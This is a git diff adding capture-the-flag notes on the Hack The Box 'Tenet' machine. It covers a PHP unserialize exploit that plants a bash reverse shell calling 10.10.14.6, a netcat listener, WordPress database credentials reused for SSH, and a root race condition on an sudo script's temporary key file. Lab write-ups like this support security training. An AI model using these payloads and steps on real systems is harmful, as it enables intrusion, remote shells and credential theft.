Update tenet

diff --git a/tenet b/tenet
--- a/tenet
+++ b/tenet
@@ -16,4 +16,151 @@ PORT   STATE SERVICE VERSION
 /wp-content           
 /wp-includes
 
-At http://10.10.10.223/wordpress/wp-includes/, there are a lot of files:
+I add tenet.htb to /etc/hosts and the page displays correctly. I then start looking for potential usernames:
+protagonist
+neil commented on http://tenet.htb/index.php/2020/12/16/logs/: "did you remove the sator php file and the backup?? the migration program is incomplete! why would you do this?!"
+
+I add sator to the /etc/hosts.And visited http://sator.tenet.htb/sator.php :
+[+] Grabbing users from text file
+[] Database updated
+I access the backup file from : http://sator.tenet.htb/sator.php.bak
+└─# cat sator.php.bak 
+<?php
+
+class DatabaseExport
+{
+	public $user_file = 'users.txt';
+	public $data = '';
+
+	public function update_db()
+	{
+		echo '[+] Grabbing users from text file <br>';
+		$this-> data = 'Success';
+	}
+
+
+	public function __destruct()
+	{
+		file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
+		echo '[] Database updated <br>';
+	//	echo 'Gotta get this working properly...';
+	}
+}
+
+$input = $_GET['arepo'] ?? '';
+$databaseupdate = unserialize($input);
+
+$app = new DatabaseExport;
+$app -> update_db();
+
+
+?>
+----------------------------------------
+Reference : https://fmash16.github.io/content/writeups/hackthebox/htb-Tenet.html
+----------------------------------------
+class DatabaseExport {
+  public $user_file = 'rce.php';
+  public $data = '<?php exec("/bin/bash -c \'bash -i > /dev/tcp/10.10.14.6/5555 0>&1\'"); ?>';
+  }
+
+print urlencode(serialize(new DatabaseExport));
+
+We curl and append the output of print from above :
+└─# curl -i http://sator.tenet.htb/sator.php?arepo=O%3A14%3A%22DatabaseExport%22%3A2%3A%7Bs%3A9%3A%22user_file%22%3Bs%3A7%3A%22rce.php%22%3Bs%3A4%3A%22data%22%3Bs%3A72%3A%22%3C%3Fphp+exec%28%22%2Fbin%2Fbash+-c+%27bash+-i+%3E+%2Fdev%2Ftcp%2F10.10.14.6%2F5555+0%3E%261%27%22%29%3B+%3F%3E%22%3B%7D
+
+Then visit the page where the rce is created : http://sator.tenet.htb/rce.php
+
+On my netcat listener :
+└─# nc -lvnp 5555
+Ncat: Connection from 10.10.10.223:54810.
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+www-data@tenet:/var/www/html/wordpress$ cat wp-config.php
+/** The name of the database for WordPress */
+define( 'DB_NAME', 'wordpress' );
+
+/** MySQL database username */
+define( 'DB_USER', 'neil' );
+
+/** MySQL database password */
+define( 'DB_PASSWORD', 'Opera2112' );
+
+/** MySQL hostname */
+define( 'DB_HOST', 'localhost' );
+
+==============User
+ssh neil@10.10.10.223 : Opera2112
+neil@tenet:~$ id
+uid=1001(neil) gid=1001(neil) groups=1001(neil)
+neil@tenet:~$ ls
+user.txt
+neil@tenet:~$ cat user.txt
+17d7e07fa0f3e7a1627ed61d7fa12f6b
+neil@tenet:~$ sudo -l
+Matching Defaults entries for neil on tenet:
+    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:
+
+User neil may run the following commands on tenet:
+    (ALL : ALL) NOPASSWD: /usr/local/bin/enableSSH.sh
+neil@tenet:~$ cat /usr/local/bin/enableSSH.sh
+#!/bin/bash
+
+checkAdded() {
+
+	sshName=$(/bin/echo $key | /usr/bin/cut -d " " -f 3)
+
+	if [[ ! -z $(/bin/grep $sshName /root/.ssh/authorized_keys) ]]; then
+
+		/bin/echo "Successfully added $sshName to authorized_keys file!"
+
+	else
+
+		/bin/echo "Error in adding $sshName to authorized_keys file!"
+
+	fi
+
+}
+
+checkFile() {
+
+	if [[ ! -s $1 ]] || [[ ! -f $1 ]]; then
+
+		/bin/echo "Error in creating key file!"
+
+		if [[ -f $1 ]]; then /bin/rm $1; fi
+
+		exit 1
+
+	fi
+
+}
+
+addKey() {
+
+	tmpName=$(mktemp -u /tmp/ssh-XXXXXXXX)
+
+	(umask 110; touch $tmpName)
+
+	/bin/echo $key >>$tmpName
+
+	checkFile $tmpName
+
+	/bin/cat $tmpName >>/root/.ssh/authorized_keys
+
+	/bin/rm $tmpName
+
+}
+
+key="ssh-rsa AAAAA3NzaG1yc2GAAAAGAQAAAAAAAQG+AMU8OGdqbaPP/Ls7bXOa9jNlNzNOgXiQh6ih2WOhVgGjqr2449ZtsGvSruYibxN+MQLG59VkuLNU4NNiadGry0wT7zpALGg2Gl3A0bQnN13YkL3AA8TlU/ypAuocPVZWOVmNjGlftZG9AP656hL+c9RfqvNLVcvvQvhNNbAvzaGR2XOVOVfxt+AmVLGTlSqgRXi6/NyqdzG5Nkn9L/GZGa9hcwM8+4nT43N6N31lNhx4NeGabNx33b25lqermjA+RGWMvGN8siaGskvgaSbuzaMGV9N8umLp6lNo5fqSpiGN8MQSNsXa3xXG+kplLn2W+pbzbgwTNN/w0p+Urjbl root@ubuntu"
+addKey
+checkAdded
+================Priv Escalation
+neil@tenet:~$ while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC33oiD3o-------------------------------------= root@kali" | tee /tmp/ssh* > /dev/null; done
+Them run sudo /usr/local/bin/enableSSH.sh a couple of times 
+And finally ssh in as root
+root@tenet:~# id
+uid=0(root) gid=0(root) groups=0(root)
+root@tenet:~# ls
+root.txt
+root@tenet:~# cat root.txt
+e2cc9e767dcb54e68dfbceb530753b9a
